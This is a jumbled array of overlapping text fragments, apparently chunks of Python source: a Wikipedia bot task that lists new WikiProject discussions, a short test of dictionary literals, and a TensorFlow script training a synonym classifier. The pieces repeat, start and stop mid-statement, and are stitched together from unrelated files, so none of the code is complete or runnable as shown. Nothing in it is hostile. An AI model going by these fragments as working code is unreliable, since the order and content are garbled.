[join_full_title(self._bot.site, ns, title.decode(\"utf8\")) for (ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s", "news): \"\"\"Save the given list of discussions to the given page title.\"\"\" text", "after + \"</noinclude>\" else: disclist = \"\\n\".join(discitems) projtalk = self._bot.get_page(project.name).toggleTalkPage().title() page = self._bot.get_page(title)", "= text % { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist }", "%d %B %Y (UTC)\") def _extract_sections(self, text): \"\"\"Return a list of section tuples", "{} chunksize = 50 for start in range(0, len(titles), chunksize): chunk = titles[start:start+chunksize]", "continue try: timestamp = self._parse_timestamp(tmpl.get(\"timestamp\").value) except ValueError: continue title = str(tmpl.get(\"title\").value) section =", "continue name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a", "self._logger.info(\"Fetching discussions updated between %s and %s\", startts, endts) with self._bot.wikidb as cursor:", "%s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for disc in", "tuples.\"\"\" sections = {} for page in pages: title = join_full_title(self._bot.site, page.ns +", "= mwparserfromhell.parse(text) discussions = {} for tmpl in code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE:", "to lists of section tuples. Given a WikiProject new discussions page, return all", "style=\"padding-bottom:1em;\">{{Clickable button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask", "= {} for page in pages: title = join_full_title(self._bot.site, page.ns + 1, page.title)", "discussions page, return all discussions currently listed. \"\"\" text = self._bot.get_page(title).text code =", "+= \": \" + \", \".join(\"[[%s]]\" % item for item in news) page.save(summary,", "not match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name = str(section.get(0).title.strip_code()).strip()", "NewDiscussions(Task): \"\"\"Updates a list of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE =", "DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp < ?", "news: summary += \": \" + \", \".join(\"[[%s]]\" % item for item in", "disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d, %H:%M:%S\")) news = [disc.title for disc in discussions", "text): \"\"\"Return a list of section tuples for the given page.\"\"\" code =", "a sorted list of the most recent discussion tuples.\"\"\" sections = {} for", "button 2|%(projtalk)s|View Other Discussions|class=mw-ui-block}} }} {{WPX list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list", "a WikiProject new discussions page, return all discussions currently listed. \"\"\" text =", "sections = {} for page in pages: title = join_full_title(self._bot.site, page.ns + 1,", "discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15", "= 3) AND rc_bot = 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching", "\"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page)) for page", "page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req = Request(self._bot.site, parameters={ \"action\": \"query\", \"prop\":", "discussions updated between %s and %s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query,", "except ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in", "[_Discussion(title, section.name, section.timestamp) for title in sections for section in sections[title]] discussions.sort(key=lambda disc:", "time range. \"\"\" query = \"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp", "[ template % { \"title\": disc.title, \"name\": disc.name, \"timestamp\": disc.timestamp.strftime(\"%H:%M, %d %B %Y", "endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts, endts)) titles = [join_full_title(self._bot.site, ns, title.decode(\"utf8\"))", "in pages: title = join_full_title(self._bot.site, page.ns + 1, page.title) if title in updated:", "%H:%M:%S\")) news = [disc.title for disc in discussions if disc.title not in current][:3]", "= project.name + \"/Discussions\" pages = project.get_members() current = self._get_current_discussions(title) discussions, news =", "if not match: continue try: timestamp = self._parse_timestamp(match.group(0)) except ValueError: continue name =", "news = self._process_discussions(pages, current, updated) self._save_discussions(project, title, discussions, news) def run(self): start =", "\"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task): \"\"\"Updates a list of", "sections[title] = updated[title] elif title in current: sections[title] = current[title] discussions = [_Discussion(title,", "code.filter_templates(): if tmpl.name != self.DISCUSSION_TEMPLATE: continue if not (tmpl.has(\"title\") and tmpl.has(\"section\") and tmpl.has(\"timestamp\")):", "self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\") for project in self._bot.get_configured_projects(): if project.config.get(\"new_discussions\"): self._process(project, updated)", "\"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary = \"Updating new discussions\" if", "start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s and %s\", startts, endts)", "for disc in discussions: self._logger.debug(\" [[%s#%s]] at %s\", disc.title, disc.name, disc.timestamp.strftime(\"%Y %m %d,", "= 0\"\"\" startts = start.strftime(\"%Y%m%d%H%M%S\") endts = end.strftime(\"%Y%m%d%H%M%S\") self._logger.info(\"Fetching discussions updated between %s", "WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX new discussion\" DISCUSSIONS_PER_PAGE = 15 DISCUSSIONS_BEFORE_FOLD = 4", "a datetime for the given timestamp string, or ValueError.\"\"\" return datetime.strptime(str(text), \"%H:%M, %d", "in code.get_sections(levels=[2]): clean = section.strip_code() match = re.search(r\"\\d\\d:\\d\\d,\\s\\d\\d?\\s\\w+\\s\\d{4}\\s\\(UTC\\)\", clean) if not match: continue", "import Request __all__ = [\"NewDiscussions\"] _Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\",", "-- Provides a list of new discussions within a WikiProject's scope Copyright (C)", "button 2|%(projname)s|Return to WikiProject|class=mw-ui-neutral}}</div></noinclude> {{WPX action box|color={{{2|#086}}}|title=Have a question?|content= {{Clickable button 2|url={{fullurl:%(projtalk)s|action=edit&section=new}}|Ask the", "ValueError: continue title = str(tmpl.get(\"title\").value) section = _Section(str(tmpl.get(\"section\").value), timestamp) if title in discussions:", "item in news) page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new discussions for", "# -*- coding: utf-8 -*- \"\"\" New Discussions -- Provides a list of", "% { \"title\": title, \"projname\": project.name, \"projtalk\": projtalk, \"discussions\": disclist } summary =", "\" + \", \".join(\"[[%s]]\" % item for item in news) page.save(summary, minor=False) def", "for disc in discussions if disc.title not in current][:3] return discussions, news def", "Licensed under MIT License: http://mitlicense.org \"\"\" from collections import namedtuple from datetime import", "titles[start:start+chunksize] pages = self._load_pages(chunk) for title, text in pages: try: sections[title] = self._extract_sections(text)", "len(titles)) sections = {} chunksize = 50 for start in range(0, len(titles), chunksize):", "_Section = namedtuple(\"_Section\", [\"name\", \"timestamp\"]) _Discussion = namedtuple(\"_Discussion\", [\"title\", \"name\", \"timestamp\"]) class NewDiscussions(Task):", "2 = 1 AND rc_namespace != 3 AND (rc_type = 0 OR rc_type", "list start|intro={{WPX last updated|%(title)s}}}} %(discussions)s {{WPX list end|more=%(title)s}} \"\"\" template = \"{{WPX new", "\"rvprop\": \"content\", \"rvslots\": \"main\", \"formatversion\": \"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return", "\"\"\"SELECT DISTINCT rc_namespace, rc_title FROM recentchanges WHERE rc_timestamp >= ? AND rc_timestamp <", "title): \"\"\"Return a dict mapping talk page titles to lists of section tuples.", "-*- coding: utf-8 -*- \"\"\" New Discussions -- Provides a list of new", "\"2\", \"titles\": \"|\".join(titles) }) data = req.submit() return [(page[\"title\"], _get_rev(page)) for page in", "def _process_discussions(self, pages, current, updated): \"\"\"Return a sorted list of the most recent", "? AND rc_namespace % 2 = 1 AND rc_namespace != 3 AND (rc_type", "included in the dict are those that have been updated in the given", "4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the given timestamp string, or", "\"\"\"Updates a list of new discussions within a WikiProject's scope.\"\"\" DISCUSSION_TEMPLATE = \"WPX", "start = self._bot.get_last_updated(\"new_discussions\") end = datetime.utcnow() updated = self._get_updated_discussions(start, end) self._logger.info(\"Updating discussion reports\")", "pages: title = join_full_title(self._bot.site, page.ns + 1, page.title) if title in updated: sections[title]", "API.\"\"\" def _get_rev(page): try: return page[\"revisions\"][0][\"slots\"][\"main\"][\"content\"] except (KeyError, IndexError): return \"\" req =" ]
[ "a = {} b = {1: 2} c = {3: 4, 5: 6}", "c = {3: 4, 5: 6} d = {7: \"seven\", 8: \"eight\", 9:", "{} b = {1: 2} c = {3: 4, 5: 6} d =", "# tests for dictionary displays a = {} b = {1: 2} c", "= {3: 4, 5: 6} d = {7: \"seven\", 8: \"eight\", 9: \"nine\",", "for dictionary displays a = {} b = {1: 2} c = {3:", "tests for dictionary displays a = {} b = {1: 2} c =", "\"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print a print b print c", "displays a = {} b = {1: 2} c = {3: 4, 5:", "2} c = {3: 4, 5: 6} d = {7: \"seven\", 8: \"eight\",", "d = {7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print", "{1: 2} c = {3: 4, 5: 6} d = {7: \"seven\", 8:", "= {1: 2} c = {3: 4, 5: 6} d = {7: \"seven\",", "\"nine\", 10: \"one\" + \"zero\"} print a print b print c print d", "dictionary displays a = {} b = {1: 2} c = {3: 4,", "8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print a print b print", "4, 5: 6} d = {7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\"", "6} d = {7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"}", "= {} b = {1: 2} c = {3: 4, 5: 6} d", "<gh_stars>100-1000 # tests for dictionary displays a = {} b = {1: 2}", "5: 6} d = {7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" +", "{7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print a print", "b = {1: 2} c = {3: 4, 5: 6} d = {7:", "\"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print a print b", "{3: 4, 5: 6} d = {7: \"seven\", 8: \"eight\", 9: \"nine\", 10:", "9: \"nine\", 10: \"one\" + \"zero\"} print a print b print c print", "= {7: \"seven\", 8: \"eight\", 9: \"nine\", 10: \"one\" + \"zero\"} print a" ]
[ "tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out * 50 + 50", "= opt.minimize(loss) with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in", "readerX.genAllXY() yInTemp = [[i,1 - i] for i in yInTemp] print 'Reader Done'", "= (None, 2)) num = 30 num2 = 20 print num, num2 with", "2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test", "loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy =", "L2_out * 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss =", "import readerX import tensorflow as tf import numpy as np import random import", "- 1000 print 'Sample size is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix", "tf.nn.softmax(Lf_in) # rst = L2_out * 50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out,", "= tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2))", "b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2", "print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) #", "del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape = (None, data_dim))", "# piece = 999999 # sample_num = piece * 49 xInTemp, yInTemp =", "W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) #", "y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim),", "xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' * 20 print 'cnt',", "sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val", "tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1))", "#这个文件用tf实现一个单层神经网络,用来判断两个词是否是同义词 #输入是readerX产生的X@200 和Y@1 #划分测试集和监督集、测试集 #使用三层神经网进行训练,n个隐藏层和1个输出层?? import readerX import tensorflow as tf import numpy", "print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 =", "= np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 'Sample size is : ',sample_num", "'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3)", "np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 'Sample size is", "i] for i in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn =", "data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2)) num = 30 num2 =", "# L2_in = tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2,", "import tensorflow as tf import numpy as np import random import gc data_dim", "tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst", "0.99: print '#' * 20 print accu print accu_test print cnt print 'Done'", "',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape = (None,", "和Y@1 #划分测试集和监督集、测试集 #使用三层神经网进行训练,n个隐藏层和1个输出层?? import readerX import tensorflow as tf import numpy as np", "accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess: print", "and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test =", "train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) #", "print '#' * 20 print accu print accu_test print cnt print 'Done' break", "num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1,", "ySam = yIn[randList, :] # print ySam # _, loss_val, W_val = sess.run([train_op,", "_, loss_val, W_val = sess.run([train_op, loss, W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1,", "loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss)", ": ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape =", "- i] for i in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn", "yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print", "-tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction =", "correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy)", "W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000", "gc data_dim = 200#输入数据的维度 # piece = 999999 # sample_num = piece *", "2))}) # print W1_val print '#' * 20 print 'cnt', cnt print loss_val", "W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) #", "W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val = sess.run([train_op,", "y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss", "piece = 999999 # sample_num = piece * 49 xInTemp, yInTemp = readerX.genAllXY()", "random.sample(inputLong,577) # print inputSam xSam = xIn[randList, :] ySam = yIn[randList, :] #", "tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2)) num", "= train_accuracy.eval(feed_dict={x: xIn[:sample_num], y: yIn[:sample_num].reshape((-1, 2))}) accu_test = train_accuracy.eval(feed_dict={x: xIn[sample_num:], y: yIn[sample_num:].reshape((-1, 2))})", ":] # print ySam # _, loss_val, W_val = sess.run([train_op, loss, W3], #", "as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num,", "num = 30 num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 =", "import random import gc data_dim = 200#输入数据的维度 # piece = 999999 # sample_num", "= tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1", "xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num = len(yIn) - 1000 print 'Sample", "num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in)", "# W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32)", "W1_val print '#' * 20 print 'cnt', cnt print loss_val print accu print", "= tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out * 50 +", "#划分测试集和监督集、测试集 #使用三层神经网进行训练,n个隐藏层和1个输出层?? import readerX import tensorflow as tf import numpy as np import", "tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 =", "W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num,", "+ b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3", "20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32) b1", "+ 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss", "sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577)", "yInTemp = [[i,1 - i] for i in yInTemp] print 'Reader Done' xIn", "yIn[randList, :] # print ySam # _, loss_val, W_val = sess.run([train_op, loss, W3],", "readerX import tensorflow as tf import numpy as np import random import gc", "tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in =", "#使用三层神经网进行训练,n个隐藏层和1个输出层?? import readerX import tensorflow as tf import numpy as np import random", "accu_test # print W_val if accu > 0.99: print '#' * 20 print", "loss, W3], # feed_dict={x: xIn[:sample_num], # y: yIn[:sample_num].reshape((-1, 2))}) _, loss_val, W_val =", "in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num =", "opt.minimize(loss) with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000):", "dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) +", "'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam", "'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out", "= tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2),", "if accu > 0.99: print '#' * 20 print accu print accu_test print", "= tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with", "= 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1', dtype=tf.float32)", "tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) #", "tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary =", "# loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = tf.equal(tf.argmax(Lf_out,1), tf.argmax(y,1)) train_accuracy", "= (None, data_dim)) y = tf.placeholder(tf.float32, shape = (None, 2)) num = 30", "2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out, W3) Lf_out = tf.nn.softmax(Lf_in) # rst =", "tf import numpy as np import random import gc data_dim = 200#输入数据的维度 #", "L2_in = tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2),", "= 200#输入数据的维度 # piece = 999999 # sample_num = piece * 49 xInTemp,", "is : ',sample_num del(yInTemp) del(xInTemp) gc.collect() print 'Matrix Prepared' x = tf.placeholder(tf.float32, shape", "xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam xSam", "tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2 L2_out =", "train_accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\")) train_accuracy_summary = tf.summary.scalar(\"training accuracy\", train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op", "= piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp = [[i,1 - i]", "as np import random import gc data_dim = 200#输入数据的维度 # piece = 999999", "= tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2),", "for i in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp)", "sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200))", "y: yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' * 20 print 'cnt', cnt", "W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 = tf.Variable(np.random.rand(1, num2), 'bias2', dtype=tf.float32) #", "train_accuracy) opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess: print 'Training", "W_val if accu > 0.99: print '#' * 20 print accu print accu_test", "> 0.99: print '#' * 20 print accu print accu_test print cnt print", "= tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2", "b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) # b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32)", "accu print accu_test # print W_val if accu > 0.99: print '#' *", "tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32)", "= yIn[randList, :] # print ySam # _, loss_val, W_val = sess.run([train_op, loss,", "'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out =", "num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num), 'weight1',", "30 num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"): W1 = tf.Variable(np.random.rand(data_dim, num),", "dtype=tf.float32) # L2_in = tf.matmul(L1_out, W2) + b2 L2_out = tf.nn.sigmoid(L2_in) W3 =", "loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y *", "num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1 #L1_out = tf.nn.softmax(L1_in) L1_out", "numpy as np import random import gc data_dim = 200#输入数据的维度 # piece =", "999999 # sample_num = piece * 49 xInTemp, yInTemp = readerX.genAllXY() yInTemp =", "2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1, 2), 'bias2', dtype=tf.float32) Lf_in = tf.matmul(L2_out,", "* 20 print 'cnt', cnt print loss_val print accu print accu_test # print", "# print W1_val print '#' * 20 print 'cnt', cnt print loss_val print", "# b1 = tf.Variable(np.random.rand(1, num), 'bias1', dtype=tf.float32) L1_in = tf.matmul(x, W1) + b1", "== 0 or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu = train_accuracy.eval(feed_dict={x:", "cnt%1000 == 0 or( cnt < 2000 and cnt%100 == 0):#!!!!!!!!!!!在这里!!!!!!!! accu =", "= tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2", "Prepared' x = tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape =", "2))}) _, loss_val, W_val = sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1,", "# loss = tf.contrib.losses.mean_squared_error(L1_out, y) loss = -tf.reduce_sum(y * tf.log(Lf_out)) # loss =", "opt = tf.train.AdamOptimizer(0.01) train_op = opt.minimize(loss) with tf.Session() as sess: print 'Training Start'", "tf.nn.softmax(L1_in) L1_out = tf.nn.sigmoid(L1_in) # W2 = tf.Variable(np.random.rand(num, num2), 'weight2', dtype=tf.float32) b2 =", "(None, 2)) num = 30 num2 = 20 print num, num2 with tf.variable_scope(\"Ez_flat\"):", "L2_out = tf.nn.sigmoid(L2_in) W3 = tf.Variable(np.random.rand(num2, 2), 'weight2', dtype=tf.float32) # b3 = tf.Variable(np.random.rand(1,", "50 + 50 # loss = tf.contrib.losses.mean_squared_error(L1_out, y) # loss = tf.contrib.losses.mean_squared_error(L1_out, y)", "= tf.nn.softmax(Lf_in) # rst = L2_out * 50 + 50 # loss =", "tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList =", "in xrange(100000000): randList = np.random.randint(0,sample_num, size=(1,200)) # inputSam = random.sample(inputLong,577) # print inputSam", "i in yInTemp] print 'Reader Done' xIn = np.matrix(xInTemp) yIn = np.matrix(yInTemp) sample_num", "data_dim = 200#输入数据的维度 # piece = 999999 # sample_num = piece * 49", "y: ySam.reshape(-1, 2)}) if cnt%1000 == 0 or( cnt < 2000 and cnt%100", "= xIn[randList, :] ySam = yIn[randList, :] # print ySam # _, loss_val,", "'Matrix Prepared' x = tf.placeholder(tf.float32, shape = (None, data_dim)) y = tf.placeholder(tf.float32, shape", "with tf.Session() as sess: print 'Training Start' sess.run(tf.global_variables_initializer()) for cnt in xrange(100000000): randList", "cnt print loss_val print accu print accu_test # print W_val if accu >", "= sess.run([train_op, loss, W3], feed_dict={x: xSam.reshape(-1, data_dim), y: ySam.reshape(-1, 2)}) if cnt%1000 ==", "random import gc data_dim = 200#输入数据的维度 # piece = 999999 # sample_num =", "yIn[sample_num:].reshape((-1, 2))}) # print W1_val print '#' * 20 print 'cnt', cnt print", "= -tf.reduce_sum(y * tf.log(Lf_out)) # loss = tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction", "import gc data_dim = 200#输入数据的维度 # piece = 999999 # sample_num = piece", "#输入是readerX产生的X@200 和Y@1 #划分测试集和监督集、测试集 #使用三层神经网进行训练,n个隐藏层和1个输出层?? import readerX import tensorflow as tf import numpy as", "Lf_out = tf.nn.softmax(Lf_in) # rst = L2_out * 50 + 50 # loss", "tf.reduce_mean(loss) with tf.name_scope(\"training-accuracy\") as scope: correct_prediction = 